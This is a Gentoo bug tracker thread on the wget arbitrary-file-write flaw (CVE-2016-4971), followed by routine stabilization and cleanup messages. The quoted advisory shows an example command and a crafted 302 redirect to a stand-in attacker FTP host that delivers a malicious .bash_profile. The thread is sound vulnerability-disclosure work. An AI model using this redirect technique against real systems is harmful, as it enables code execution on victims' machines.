From ${URL} : GNU Wget (including the latest version) when supplied with a malicious website link can be tricked into saving an arbitrary remote file supplied by an attacker, with arbitrary contents and filename under the current directory. This can lead to potential code execution by creating system scripts (such as .bash_profile and others) within home directory as well as other unauthorized actions (such as request sniffing by proxy modification, or arbitrary system file retrieval) by uploading .wgetrc configuration file. Because of lack of sufficient controls in wget, when user downloads a file with wget, such as: wget http://attackers-server/safe_file.txt An attacker who controls the server could make wget create an arbitrary file with arbitrary contents and filename by issuing a crafted HTTP 30X Redirect containing ftp server reference in response to the victim's wget request. For example, if the attacker's server replies with the following response: HTTP/1.1 302 Found Cache-Control: private Content-Type: text/html; charset=UTF-8 Location: ftp://attackers-server/.bash_profile Content-Length: 262 Server: Apache wget will automatically follow the redirect and will download a malicious .bash_profile file from a malicious FTP server. It will fail to rename the file to the originally requested filename of 'safe_file.txt' as it would normally do, in case of a redirect to another HTTP resource with a different name. Because of this vulnerability, an attacker is able to upload an arbitrary file with an arbitrary filename to the victim's current directory. @maintainer(s): since the fixed package is already in the tree, please let us know if it is ready for the stabilization or not.
i added 1.18 last nite. should be fine for stable.
Stable on alpha.
@arches, please stabilize: =net-misc/wget-1.18
Stable for PPC64.
Stable for HPPA.
arm stable
amd64 stable
x86 stable
CVE-2016-4971 (http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4971): GNU wget before 1.18 allows remote servers to write to arbitrary files by redirecting a request from HTTP to a crafted FTP resource.
Added to existing GLSA.
ppc stable
sparc stable
ia64 stable. Maintainer(s), please cleanup. Security, please add it to the existing request, or file a new one.
Arches, Thank you for your work. Added to an existing GLSA Request. Maintainer(s), please drop the vulnerable version(s). Version: 1.17.1-r1 : 0
This issue was resolved and addressed in GLSA 201610-11 at https://security.gentoo.org/glsa/201610-11 by GLSA coordinator Kristian Fiskerstrand (K_F).
Reopening for Cleanup - Version wget-1.17.1-r1 still in tree.
commit 98185b2fdd2323a4242c46a396174e9eb5409b17 Author: Lars Wendler <polynomial-c@gentoo.org> Date: Mon Oct 31 08:11:21 2016 net-misc/wget: Removed vulnerable version. Package-Manager: portage-2.3.2 Signed-off-by: Lars Wendler <polynomial-c@gentoo.org>
Thanks!